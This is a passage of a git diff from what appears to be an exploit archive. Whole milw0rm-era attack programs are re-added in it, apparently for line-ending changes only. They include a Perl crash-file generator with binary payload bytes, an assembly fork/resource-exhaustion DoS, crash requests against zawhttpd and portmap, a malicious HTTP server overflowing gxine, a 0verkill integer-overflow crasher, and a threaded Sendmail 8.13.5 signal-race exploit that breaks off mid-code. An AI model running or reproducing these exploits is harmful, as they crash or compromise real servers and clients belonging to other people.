+"\xD9\x3F\x8C\x71\xE0\x11\xA6\x72\xDE\x27\x42\x45\x99\x68\x48\xB1\x64\x87\x80\xDC\xA5\x68\x8A\x5A". +"\x9F\x4E\x73\x6E\xD0\xF5\x1E\xE7\xFC\xD5\x61\x95\x1F\xF2\x88\x56\xA3\x45\x56\xCE\xF3\x82\x00\x00". +"\x01\x5D\x58\x02\x00\x00\x64\x00\x82\x01\x03\x00\x00\x00\x00\x08\x80\x02\x00\x00\x5C\x0E\x00\x00". +"\x80\x02\x2A\x00\x00\x76\x7E\x5A\x0C\xA0\x88\xE8\x44\x3D\xAA\x40\x58\xA4\x26\x9A\x5F\x04\x21\x26". +"\x19\x06\x04\x81\x76\x84\xEB\x72\x64\x3F\x20\x25\x33\x50\xF7\x17\x6F\xD6\x6C\x35\x9E\xDC\x95\x32". +"\x60\x1D\xB5\xB3\x1B\x07\x50\xCD\xCE\xBC\x7B\xE5\xBD\xED\xE3\xAB\xF1\xA0\x10\x10\x55\x74\x32\x1F". +"\x2E\x20\x25\x29\x9C\xA0\x0A\x88\x80\x93\x49\x75\xA9\xBD\x98\x02\x6A\x90\x10\x6A\xA0\x24\x9A\xCC". +"\xE5\xC0\x32\xB9\x8C\x99\x8D\xE9\x8C\xD0\x63\x3A\x18\xC5\xE0\x25\xA4\xC2\x64\xB0\x80\x60\x55\x83". +"\x2B\x9D\x0E\x49\xBA\x1E\x3A\xFF\x11\x81\x01\x05\x67\x43\x21\xED\x46\xD4\x29\x28\x7D\x48\x45\x00". +"\xC1\x93\x2D\x8B\x8A\x24\xC4\x98\x50\x00\x19\x08\x84\xD2\x10\x19\x21\x7C\xF6\x0A\x50\x1B\x0A\xEB". +"\xB6\xC9\x8D\xB2\xE0\x40\x2D\x88\x98\x06\x0C\x16\x90\x77\xAB\xDD\x08\x10\xA9\x2F\x1D\x7F\x79\xC1". +"\x40\x82\xB3\xA1\x90\xF6\xAE\xC0\xA7\xC0\x96\x00\x9D\x02\x43\x42\x9B\x22\x03\x4A\x49\x20\x01\x54". +"\xC4\x03\x00\xC8\x30\x43\x24\x67\x20\x41\x92\xD6\xEB\x51\x99\xB5\x24\x12\x21\xA4\x96\x13\xB9\x98". +"\x99\x6B\x8D\xC0\xC5\x3E\xBC\x74\x7E\x2C\x00\x01\x15\x67\x43\x21\xEE\xE0\x94\xBF\x6A\x50\x8C\x8E". +"\x10\xD0\x8D\x46\x8C\x84\x41\x41\x32\xE1\x78\xEB\xFD\x41\x06\x00\x05\x78\x43\x21\xF3\x7B\x02\x4B"; + + +for ($i = 0; $i < $len; $i++) { +$buffer .= "\x41"; +} + +open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\n"; +print EGG $header; +print EGG $buffer; +print EGG $end; + +close(EGG); + +# milw0rm.com [2006-04-04] diff --git a/platforms/linux/dos/1657.asm b/platforms/linux/dos/1657.asm index adb54b46d..3c08f9436 100755 --- a/platforms/linux/dos/1657.asm +++ b/platforms/linux/dos/1657.asm @@ -1,44 +1,44 @@ -;nasm -f elf noHeaven.asm -;ld -s -o noHeaven noHeaven.o - -section .text - global _start - -count equ 8 ; threads count - do it quicker - -_start: - mov ebx, count - call create_threads - jmp done -_pause: - mov eax,29 - int 0x80 - ret -create_threads: - mov eax,2 - int 0x80 - test eax,eax - jz consume - dec ebx - test ebx,ebx - jnz create_threads - ret -consume: -setsid: ; so we won't get counted as one thread in oom_killer() - xor ebx,ebx ; each task will have about 20 oom_score which - mov eax,66 ; is less than 'init' and others - int 0x80 - push eax -loopek: - mov eax,259 - mov ebx,0 - mov ecx,0 - mov edx,esp - int 0x80 - jmp loopek -done: - xor ebx,ebx - mov eax,1 - int 0x80 - -; milw0rm.com [2006-04-09] +;nasm -f elf noHeaven.asm +;ld -s -o noHeaven noHeaven.o + +section .text + global _start + +count equ 8 ; threads count - do it quicker + +_start: + mov ebx, count + call create_threads + jmp done +_pause: + mov eax,29 + int 0x80 + ret +create_threads: + mov eax,2 + int 0x80 + test eax,eax + jz consume + dec ebx + test ebx,ebx + jnz create_threads + ret +consume: +setsid: ; so we won't get counted as one thread in oom_killer() + xor ebx,ebx ; each task will have about 20 oom_score which + mov eax,66 ; is less than 'init' and others + int 0x80 + push eax +loopek: + mov eax,259 + mov ebx,0 + mov ecx,0 + mov edx,esp + int 0x80 + jmp loopek +done: + xor ebx,ebx + mov eax,1 + int 0x80 + +; milw0rm.com [2006-04-09] diff --git a/platforms/linux/dos/1746.pl b/platforms/linux/dos/1746.pl index 541bc2a2c..464eb0acd 100755 --- a/platforms/linux/dos/1746.pl +++ b/platforms/linux/dos/1746.pl @@ -1,26 +1,26 @@ -#!/usr/bin/perl -# zawhttpd Buffer Overflow Exploit -# by Kamil 'K3' Sienicki - -use IO::Socket; -use strict; - -my($socket) = ""; - -if($socket = IO::Socket::INET->new( - PeerAddr => $ARGV[0], - PeerPort => $ARGV[1], - Proto => "TCP")) -{ - print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ..."; - print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n"; - close($socket); -} -else -{ - print "perl zawhttpd.pl localhost 80 \n"; - print "Cannot connect to $ARGV[0]:$ARGV[1]\n"; -} -#EoF - -# milw0rm.com [2006-05-04] +#!/usr/bin/perl +# zawhttpd Buffer Overflow Exploit +# by Kamil 'K3' Sienicki + +use IO::Socket; +use strict; + +my($socket) = ""; + +if($socket = IO::Socket::INET->new( + PeerAddr => $ARGV[0], + PeerPort => $ARGV[1], + Proto => "TCP")) +{ + print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ..."; + print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n"; + close($socket); +} +else +{ + print "perl zawhttpd.pl localhost 80 \n"; + print "Cannot connect to $ARGV[0]:$ARGV[1]\n"; +} +#EoF + +# milw0rm.com [2006-05-04] diff --git a/platforms/linux/dos/1815.c b/platforms/linux/dos/1815.c index 8affea010..2e22da8b5 100755 --- a/platforms/linux/dos/1815.c +++ b/platforms/linux/dos/1815.c @@ -1,106 +1,106 @@ -///////////////////////////////////// -// portmap Set+Dump Local DoS - PoC -//////////////////////////////////// -// -// Federico L. Bossi Bonin -// fbossi[at]netcomm[dot]com[dot]ar -//////////////////////////////////// - -// Tested on Linux with version 5 - -// USE DEBUGGING MODE -///////////////////// - -// (gdb) backtrace -// #0 0xffffe410 in __kernel_vsyscall () -// #1 0xb7f21343 in write () from /lib/tls/libc.so.6 -// #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6 -// #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6 -// #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6 -// #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6 -// #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6 -// #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6 -// #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6 -// #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6 -// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6 -// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6 -// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6 -// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6 -// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515 -// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6 -// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6 -// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6 -// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303 - -#include -#include -#include -#include -#include -#include - -int i; -int len=600; -char myhost[256]; - -main(int argc, char *argv[]) { - -if (argc < 2) { -printf("usage:%s \n",argv[0]); -exit(1); -} - -if (argc >2) { len=atoi(argv[2]); } -if (len > 1024) { len=1024; } - -unsigned long PROGRAM=100000; -unsigned long VERSION=2; - -struct hostent *hp; -struct sockaddr_in server_addr; -int sock = RPC_ANYSOCK; -register CLIENT *client; -enum clnt_stat clnt_stat; -struct timeval timeout; -timeout.tv_sec = 40; -timeout.tv_usec = 0; - - -if ((hp = gethostbyname(argv[1])) == NULL) { -printf("Can't resolve %s\n",argv[1]); -exit(0); -} - -gethostname(myhost,255); -bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length); -server_addr.sin_family = AF_INET; -server_addr.sin_port = 0; - -if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) { -clnt_pcreateerror("clnttcp_create"); -exit(0); -} - -client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL); - -char *data = (char *) malloc(1024); -memset(data,0x0,strlen(data)); - -char *response = (char *) malloc(1024); -memset(response,0x0,strlen(response)); - -for (i = 0 ; i < len ; i++) { -memcpy(data+strlen(data),"1",1); -clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); -} - -clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); - -clnt_destroy(client); -close(sock); -free(data); -free(response); -exit(0); -} - -// milw0rm.com [2006-05-22] +///////////////////////////////////// +// portmap Set+Dump Local DoS - PoC +//////////////////////////////////// +// +// Federico L. Bossi Bonin +// fbossi[at]netcomm[dot]com[dot]ar +//////////////////////////////////// + +// Tested on Linux with version 5 + +// USE DEBUGGING MODE +///////////////////// + +// (gdb) backtrace +// #0 0xffffe410 in __kernel_vsyscall () +// #1 0xb7f21343 in write () from /lib/tls/libc.so.6 +// #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6 +// #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6 +// #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6 +// #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6 +// #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6 +// #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6 +// #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6 +// #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6 +// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6 +// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6 +// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6 +// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6 +// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515 +// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6 +// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6 +// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6 +// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303 + +#include +#include +#include +#include +#include +#include + +int i; +int len=600; +char myhost[256]; + +main(int argc, char *argv[]) { + +if (argc < 2) { +printf("usage:%s \n",argv[0]); +exit(1); +} + +if (argc >2) { len=atoi(argv[2]); } +if (len > 1024) { len=1024; } + +unsigned long PROGRAM=100000; +unsigned long VERSION=2; + +struct hostent *hp; +struct sockaddr_in server_addr; +int sock = RPC_ANYSOCK; +register CLIENT *client; +enum clnt_stat clnt_stat; +struct timeval timeout; +timeout.tv_sec = 40; +timeout.tv_usec = 0; + + +if ((hp = gethostbyname(argv[1])) == NULL) { +printf("Can't resolve %s\n",argv[1]); +exit(0); +} + +gethostname(myhost,255); +bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length); +server_addr.sin_family = AF_INET; +server_addr.sin_port = 0; + +if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) { +clnt_pcreateerror("clnttcp_create"); +exit(0); +} + +client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL); + +char *data = (char *) malloc(1024); +memset(data,0x0,strlen(data)); + +char *response = (char *) malloc(1024); +memset(response,0x0,strlen(response)); + +for (i = 0 ; i < len ; i++) { +memcpy(data+strlen(data),"1",1); +clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); +} + +clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); + +clnt_destroy(client); +close(sock); +free(data); +free(response); +exit(0); +} + +// milw0rm.com [2006-05-22] diff --git a/platforms/linux/dos/185.sh b/platforms/linux/dos/185.sh index c841fd3a7..bade2863c 100755 --- a/platforms/linux/dos/185.sh +++ b/platforms/linux/dos/185.sh @@ -9,6 +9,6 @@ # sinfony ln -s /etc/passwd /tmp/grep.tmp - - -# milw0rm.com [2000-11-17] + + +# milw0rm.com [2000-11-17] diff --git a/platforms/linux/dos/1852.c b/platforms/linux/dos/1852.c index a8f575499..241a78ef1 100755 --- a/platforms/linux/dos/1852.c +++ b/platforms/linux/dos/1852.c @@ -1,95 +1,95 @@ -////////////////////////////////////////////////////// -// gxine - HTTP Plugin Remote Buffer Overflow PoC -///////////////////////////////////////////////////// -// -// Federico L. Bossi Bonin -// fbossi[at]netcomm[dot]com[dot]ar -///////////////////////////////////////////////////// - -// TESTED on gxine 0.5.6 -//////////////////////// - -// 0xb78eccc7 in free () from /lib/tls/libc.so.6 -// (gdb) backtrace -// #0 0xb78eccc7 in free () from /lib/tls/libc.so.6 -// #1 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so -// #2 0x41414141 in ?? () -// #3 0xb7f42164 in ?? () from /usr/lib/libxine.so.1 -// #4 0x080b1810 in ?? () -// #5 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1 -// #6 0xb7f3967f in ?? () from /usr/lib/libxine.so.1 -// #7 0x0877c084 in ?? () -// #8 0x0930a931 in ?? () -// #9 0x080880a2 in defs.3 () -// #10 0xb0088478 in ?? () -// #11 0x00000000 in ?? () - -#include -#include -#include -#include -#define PORT 81 -#define LEN 9500 - -void shoot(int); - -int main() { -struct sockaddr_in srv_addr, client; -int len,pid,sockfd,sock; - -sockfd = socket(AF_INET, SOCK_STREAM, 0); - -if (sockfd < 0) { -perror("error socket()"); -exit(1); -} - -bzero((char *) &srv_addr, sizeof(srv_addr)); -srv_addr.sin_family = AF_INET; -srv_addr.sin_addr.s_addr = INADDR_ANY; -srv_addr.sin_port = htons(PORT); - -if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { -perror("error bind()"); -exit(1); -} - - - -printf("Listening on port %i\n",PORT); - -listen(sockfd,5); -len = sizeof(client); - -while (1) { -sock = accept(sockfd, (struct sockaddr *) &client, &len); -if (sock < 0) { -perror("error accept()"); -exit(1); -} - -pid = fork(); -if (pid < 0) { -perror("fork()"); -exit(1); -} -if (pid == 0) { -close(sockfd); -printf("Conection from %s\n",inet_ntoa(client.sin_addr)); -shoot(sock); -exit(0); -} -else close(sock); -} -return 0; -} - -void shoot (int sock) { -int i; -for (i=0 ; i < LEN ; i++) { -write(sock,"\x41",1); -} - -} - -// milw0rm.com [2006-05-30] +////////////////////////////////////////////////////// +// gxine - HTTP Plugin Remote Buffer Overflow PoC +///////////////////////////////////////////////////// +// +// Federico L. Bossi Bonin +// fbossi[at]netcomm[dot]com[dot]ar +///////////////////////////////////////////////////// + +// TESTED on gxine 0.5.6 +//////////////////////// + +// 0xb78eccc7 in free () from /lib/tls/libc.so.6 +// (gdb) backtrace +// #0 0xb78eccc7 in free () from /lib/tls/libc.so.6 +// #1 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so +// #2 0x41414141 in ?? () +// #3 0xb7f42164 in ?? () from /usr/lib/libxine.so.1 +// #4 0x080b1810 in ?? () +// #5 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1 +// #6 0xb7f3967f in ?? () from /usr/lib/libxine.so.1 +// #7 0x0877c084 in ?? () +// #8 0x0930a931 in ?? () +// #9 0x080880a2 in defs.3 () +// #10 0xb0088478 in ?? () +// #11 0x00000000 in ?? () + +#include +#include +#include +#include +#define PORT 81 +#define LEN 9500 + +void shoot(int); + +int main() { +struct sockaddr_in srv_addr, client; +int len,pid,sockfd,sock; + +sockfd = socket(AF_INET, SOCK_STREAM, 0); + +if (sockfd < 0) { +perror("error socket()"); +exit(1); +} + +bzero((char *) &srv_addr, sizeof(srv_addr)); +srv_addr.sin_family = AF_INET; +srv_addr.sin_addr.s_addr = INADDR_ANY; +srv_addr.sin_port = htons(PORT); + +if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { +perror("error bind()"); +exit(1); +} + + + +printf("Listening on port %i\n",PORT); + +listen(sockfd,5); +len = sizeof(client); + +while (1) { +sock = accept(sockfd, (struct sockaddr *) &client, &len); +if (sock < 0) { +perror("error accept()"); +exit(1); +} + +pid = fork(); +if (pid < 0) { +perror("fork()"); +exit(1); +} +if (pid == 0) { +close(sockfd); +printf("Conection from %s\n",inet_ntoa(client.sin_addr)); +shoot(sock); +exit(0); +} +else close(sock); +} +return 0; +} + +void shoot (int sock) { +int i; +for (i=0 ; i < LEN ; i++) { +write(sock,"\x41",1); +} + +} + +// milw0rm.com [2006-05-30] diff --git a/platforms/linux/dos/1894.py b/platforms/linux/dos/1894.py index d87cd4824..ca40f01fb 100755 --- a/platforms/linux/dos/1894.py +++ b/platforms/linux/dos/1894.py @@ -1,83 +1,83 @@ -#!/usr/bin/env python -# -# ----------------------------------------------------- -# Exploit id: FSE:016 -# -# Author: Federico Fazzi -# Contact: federico@autistici.org -# Date: 09/06/2006, 13:58 -# Sinthesis: 0verkill 0.16, Remote integer overflow -# Product: http://artax.karlin.mff.cuni.cz/~brain/0verkill/ -# ----------------------------------------------------- -# -# Start with: -# python f_0k-0.1.py -# - -# Proof of concept: -# (gdb) run -# Starting program: /home/federico/0verkill-0.16/server -# 9. 6.2006 14:18:07 Running 0verkill server version 0.16 -# 9. 6.2006 14:18:07 Initialization. -# 9. 6.2006 14:18:07 Loading sprites. -# 9. 6.2006 14:18:07 Loading level "level1".... -# 9. 6.2006 14:18:07 Loading level graphics. -# 9. 6.2006 14:18:08 Loading level map. -# 9. 6.2006 14:18:08 Loading level objects. -# 9. 6.2006 14:18:08 Initializing socket. -# 9. 6.2006 14:18:08 Installing signal handlers. -# 9. 6.2006 14:18:08 Game started. -# 9. 6.2006 14:18:08 Sleep -# 9. 6.2006 14:18:10 Wakeup -# -# (run python f_0k-0.6.py) -# -# Program received signal SIGSEGV, Segmentation fault. -# crc32 (buf=0x837a000
, len=4294967288) at crc32.c:82 -# warning: Source file is more recent than executable. -# 82 DO8(buf); -# -# #0 0x0805b54a in recv_packet (packet=0x805fd20 "", -# max_len=256, addr=0xf18df475, addr_len=0xf18df475, sender_server=0, recipient=0, -# sender=0xbfcf6d54) at net.c:94 -# 94 if (crc!=crc32(packet,retval-12))return -1; -# -# limits byte receive is 12, if you send an inferior number of it -# the game crash. - -import os, sys -from socket import * - -usage = "run: python %s [remote_addr] [remote_port] " % os.path.basename(sys.argv[0]) - -if len(sys.argv) < 3: - print usage - sys.exit() - -host = sys.argv[1] -port = int(sys.argv[2]) - -sock = socket(AF_INET, SOCK_DGRAM) -sock.connect((host, port)) - -print "connecting.. ", -if sock > 0: - print "done!" -else: - print "wrong!" - -print "crashing the server.. ", -if sock.sendto('0x00' , (host, port)): - print "done!" -else: - print "wrong!" - -print "wait five seconds, if no data found press CTRL+C" -try: - reply = sock.recvfrom(512) - print reply -except: - print "no data receive!" - sys.exit() - -# milw0rm.com [2006-06-09] +#!/usr/bin/env python +# +# ----------------------------------------------------- +# Exploit id: FSE:016 +# +# Author: Federico Fazzi +# Contact: federico@autistici.org +# Date: 09/06/2006, 13:58 +# Sinthesis: 0verkill 0.16, Remote integer overflow +# Product: http://artax.karlin.mff.cuni.cz/~brain/0verkill/ +# ----------------------------------------------------- +# +# Start with: +# python f_0k-0.1.py +# + +# Proof of concept: +# (gdb) run +# Starting program: /home/federico/0verkill-0.16/server +# 9. 6.2006 14:18:07 Running 0verkill server version 0.16 +# 9. 6.2006 14:18:07 Initialization. +# 9. 6.2006 14:18:07 Loading sprites. +# 9. 6.2006 14:18:07 Loading level "level1".... +# 9. 6.2006 14:18:07 Loading level graphics. +# 9. 6.2006 14:18:08 Loading level map. +# 9. 6.2006 14:18:08 Loading level objects. +# 9. 6.2006 14:18:08 Initializing socket. +# 9. 6.2006 14:18:08 Installing signal handlers. +# 9. 6.2006 14:18:08 Game started. +# 9. 6.2006 14:18:08 Sleep +# 9. 6.2006 14:18:10 Wakeup +# +# (run python f_0k-0.6.py) +# +# Program received signal SIGSEGV, Segmentation fault. +# crc32 (buf=0x837a000
, len=4294967288) at crc32.c:82 +# warning: Source file is more recent than executable. +# 82 DO8(buf); +# +# #0 0x0805b54a in recv_packet (packet=0x805fd20 "", +# max_len=256, addr=0xf18df475, addr_len=0xf18df475, sender_server=0, recipient=0, +# sender=0xbfcf6d54) at net.c:94 +# 94 if (crc!=crc32(packet,retval-12))return -1; +# +# limits byte receive is 12, if you send an inferior number of it +# the game crash. + +import os, sys +from socket import * + +usage = "run: python %s [remote_addr] [remote_port] " % os.path.basename(sys.argv[0]) + +if len(sys.argv) < 3: + print usage + sys.exit() + +host = sys.argv[1] +port = int(sys.argv[2]) + +sock = socket(AF_INET, SOCK_DGRAM) +sock.connect((host, port)) + +print "connecting.. ", +if sock > 0: + print "done!" +else: + print "wrong!" + +print "crashing the server.. ", +if sock.sendto('0x00' , (host, port)): + print "done!" +else: + print "wrong!" + +print "wait five seconds, if no data found press CTRL+C" +try: + reply = sock.recvfrom(512) + print reply +except: + print "no data receive!" + sys.exit() + +# milw0rm.com [2006-06-09] diff --git a/platforms/linux/dos/2051.py b/platforms/linux/dos/2051.py index 0a4866fd6..8118d4de2 100755 --- a/platforms/linux/dos/2051.py +++ b/platforms/linux/dos/2051.py @@ -1,297 +1,297 @@ -#!/usr/bin/env python -# -# redsand@blacksecurity.org -# Sendmail 8.13.5 and below Remote Signal Handling exploit -# usage: rbl4ck-sendmail.py 127.0.0.1 0 25 -# -# - -# this exploit was leaked to the PHC (Phrack High Council) -# so instead of only letting them have a copy, we figure -# everyone should have what they have. -# -# :-) - -# -# several of the tested operating systems appear to crash at a static -# string in memory and we were unable to shift the location of that crash. -# However, Fedora gives us a nice sexy soft spot to land, one that allows us -# to control the flow of code execution -# this is only a proof of concept -# - -import os, sys, socket, time, select, string, errno, threading - -IP="127.0.0.1" -PORT=25 -fromdd = "w00t@bex.redsand.net" -def_arch = 0 -def_timeout = (60 * 60) * 2 # 2 hrs -#def_timeout = 5 # 5 seconds -domain = "localhost" -total_time = None -threshold = 2.5 - -guess_timeout = 4.0 - -threads = 40 - -arch = [ - { 'OS':'Debian 3.0-r1', 'offset':190, 'pad':28, 'return':0xbfbfdad1L } - ] - -argc = len(sys.argv) -if(argc > 1): - IP = sys.argv[1] - -if(argc > 2): - def_arch = int(sys.argv[2]) - -if(argc > 3): - PORT = int(sys.argv[3]) - -def ia32(o): - s='' - w=chr(i % 256) - o = o >> 8 - x=chr(i % 256) - o = o >> 8 - y=chr(i % 256) - o = o >> 8 - z=chr(i % 256) - - s = "%c%c%c%c" % (w,x,y,z) - return s - -def substr(i, str, off): - top=i[:off] - end=i[off+len(str):] - s = top + str + end - return s - - - -def rout( str): - print ("[bl4ck]: " + str) - -def mbanner(): - rout("Sendmail 8.13.5 and below Remote Signal Handling exploit by redsand@blacksecurity.org") - rout("Supported Operating Systems:") - p = 0 - for i in arch: - rout("{%r} %s" % (p, i['OS'])) - p += 1 - -def rsend( s, str, p=True): - sent = s.send(str ) - #sent = s.send(str + "\r\n") - if sent == 0: - rout("socket send() failed") - if(p): - rout("Sent Request: \r\n\r\n%s\r\n" % str) - -def probe(sock): - str = "HELO blacksecurity.org\r\nMAIL FROM: <%s>\r\nRCPT TO: root@%s\r\nDATA\r\n" % (fromdd,domain) - rsend(sock,str) - - -def payload(size=32764): - ret = "\x7f" * size - i = 0 - while i < size : - ret = substr(ret,": ",100 + i) - ret = substr(ret,"\r\n",200 + i) - i += 202 - - ret += "\r\n" - return ret - - -class rSendmail( threading.Thread) : - - thres = threshold - do_exit = False - btime = None - etime = None - state = 0 - total_time = 0 - - def __init__(self, thresh=0): - if not thresh == 0: - self.thres = thresh - threading.Thread.__init__ ( self ) - - - def rrecv(self,s, response=None): - buf = '' - try: - buf = s.recv(2048) - except socket.error, (ecode, reason): - #rout("Socket failure %r:%s" % (ecode, reason)) - return False - - if buf == '': - return False - - rout("Reading response: \r\n\r\n%s\r\n" % buf[0:-2]) - msg = buf[0:-2].split("\r\n") - for m in msg: - - k = m[0:3] - if (k != None) and (k != '') and (k != "\x7f\x7f\x7f"): - code = int(m[0:3]) - else: - code = 0 - - if( code == 354 and self.state == 0 ): - self.btime = time.time() - self.state += 1 - return True - elif( code == 451 and self.state == 1): - self.etime = time.time() - self.state += 1 - return True - elif( code == 451 and self.state == 4): - self.state += 1 - return True - elif( code == 354 and self.state == 3): - self.state += 1 - return True - - if (self.state == 5): - self.state += 1 - rout("Debug error, unable to escalate state") - self.stop() - return False - - if(response != None): - rsend(s,response) - - def stop(self): - self.do_exit = True - - - def run (self ): - - rout("Connecting to %s:%r" % (IP,PORT)) - - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - sock.setblocking(0) # non-blocking 0hn0 - - try: - sock.connect((IP, PORT)) - except socket.error, (ecode, reason): - if ecode in (115, 150): pass - else: - rout("Error %r:%s" % (ecode,reason)) - return - - ret = select.select([sock],[sock],[], def_timeout) - - if len(ret[1]) == 0 and len (ret[0]) == 0: - sock.close() - rout("Timed out on connect") - return - - rout("Setting non-blocking options with a default timeout of %r seconds" % def_timeout) - - xplbuf = "\xAF\xBE\xAD\xDE" - - probe1 = False - probe2 = False - pump = False - - while not self.do_exit: - - readsock, writesock, err = select.select([sock],[sock],[], def_timeout) - if len(readsock) > 0: - for s in readsock: - self.rrecv(s) - - if len(writesock) > 0: - for s in writesock: - if(self.state == 0): - if not probe1: - probe(s) # rsend(s,"HELO") - probe1 = True - break - - if(self.state == 1): - if not pump: - pump = True - time.sleep(guess_timeout - (0.9)) - rsend(s,payload(32764) + "\r\n", False) - rout("Sending heavy load") - - break - - if(self.state == 2): - # measure timeout - # wait = end - start - # where end is time of code 451 & start is 354 go ahead - self.total_time = (self.etime - self.btime) + self.thres - #self.total_time = (self.etime - self.btime) - self.state += 1 - - if(self.state == 3): - if not probe2: - rsend(s,"\n") - probe(s) - probe2 = True - break - - if(self.state == 4): - ## race here - # send bad header - # lets wait - rsend(s, xplbuf + "\r\n") - rout("Sleeping...") - time.sleep(self.total_time) - rsend(s, xplbuf + "\r\n") - - rout("Sent race-request") - self.state = 5 - break - - if(self.state == 5): - rout("State reached stage: %r" % self.state) - rout("Total wait time: %s" % self.total_time) - self.stop() - break - - self.stop() - return - - - - -mbanner() - -t_list = [] - -t = threshold - -opc = 0 - -while threading.activeCount() < threads: - opc += 1 - rout("Starting Thread: %r with time+offset: %r" % (opc, t)) - m = rSendmail(t) - m.start() - t += 0.2 - time.sleep(5) - - -sys.exit(5) # success ?? - -""" -buf = "" -atom = "\\\xff" * int(arch[def_arch]['pad']) -idx = 256 * 4 -newtag=substr(xpl[idx:],ia32(arch[def_arch]['return']), int(arch[def_arch]['offset'])) -xpl=substr(xpl, newtag, idx) -xpl=substr(xpl,atom,len(xpl)) -""" - -# milw0rm.com [2006-07-21] +#!/usr/bin/env python +# +# redsand@blacksecurity.org +# Sendmail 8.13.5 and below Remote Signal Handling exploit +# usage: rbl4ck-sendmail.py 127.0.0.1 0 25 +# +# + +# this exploit was leaked to the PHC (Phrack High Council) +# so instead of only letting them have a copy, we figure +# everyone should have what they have. +# +# :-) + +# +# several of the tested operating systems appear to crash at a static +# string in memory and we were unable to shift the location of that crash. +# However, Fedora gives us a nice sexy soft spot to land, one that allows us +# to control the flow of code execution +# this is only a proof of concept +# + +import os, sys, socket, time, select, string, errno, threading + +IP="127.0.0.1" +PORT=25 +fromdd = "w00t@bex.redsand.net" +def_arch = 0 +def_timeout = (60 * 60) * 2 # 2 hrs +#def_timeout = 5 # 5 seconds +domain = "localhost" +total_time = None +threshold = 2.5 + +guess_timeout = 4.0 + +threads = 40 + +arch = [ + { 'OS':'Debian 3.0-r1', 'offset':190, 'pad':28, 'return':0xbfbfdad1L } + ] + +argc = len(sys.argv) +if(argc > 1): + IP = sys.argv[1] + +if(argc > 2): + def_arch = int(sys.argv[2]) + +if(argc > 3): + PORT = int(sys.argv[3]) + +def ia32(o): + s='' + w=chr(i % 256) + o = o >> 8 + x=chr(i % 256) + o = o >> 8 + y=chr(i % 256) + o = o >> 8 + z=chr(i % 256) + + s = "%c%c%c%c" % (w,x,y,z) + return s + +def substr(i, str, off): + top=i[:off] + end=i[off+len(str):] + s = top + str + end + return s + + + +def rout( str): + print ("[bl4ck]: " + str) + +def mbanner(): + rout("Sendmail 8.13.5 and below Remote Signal Handling exploit by redsand@blacksecurity.org") + rout("Supported Operating Systems:") + p = 0 + for i in arch: + rout("{%r} %s" % (p, i['OS'])) + p += 1 + +def rsend( s, str, p=True): + sent = s.send(str ) + #sent = s.send(str + "\r\n") + if sent 